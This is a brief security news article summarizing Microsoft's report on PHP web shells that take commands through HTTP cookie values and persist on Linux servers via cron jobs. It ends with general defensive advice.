Cookie-Controlled PHP Web Shells: A New Threat to Linux Servers

Microsoft’s Defender Security Research Team has uncovered a new technique used by threat actors to control PHP-based web shells on Linux servers, leveraging HTTP cookies as a control channel to execute remote code.

Unlike traditional methods, these web shells don’t rely on URL parameters or request bodies to execute commands. Instead, they use cookie values supplied by the threat actors to gate execution, making them more stealthy and harder to detect.

The use of HTTP cookies as a control channel allows attackers to persist on compromised systems, even after a reboot, by scheduling tasks via cron jobs on Linux servers. This technique enables them to maintain access to the system and execute malicious code remotely.

Microsoft’s findings highlight the evolving nature of web shell attacks and the need for organizations to stay vigilant and monitor their systems for suspicious activity. By understanding these new techniques, security teams can improve their defenses and protect against these types of threats.

The discovery of cookie-controlled PHP web shells serves as a reminder of the importance of implementing robust security measures, including regular system monitoring, secure coding practices, and keeping software up-to-date. As threat actors continue to innovate and exploit new vulnerabilities, such as CVE-2022-30190, it’s essential for organizations to stay ahead of the threat landscape.

Source: Original Article

Press ESC to close

Share Article:

Tarang Parmar

China-Linked TA416 Targets European Governments with Sophisticated Malware and Phishing Tactics

North Korean Hackers UNC1069 Use Social Engineering to Breach Axios npm Package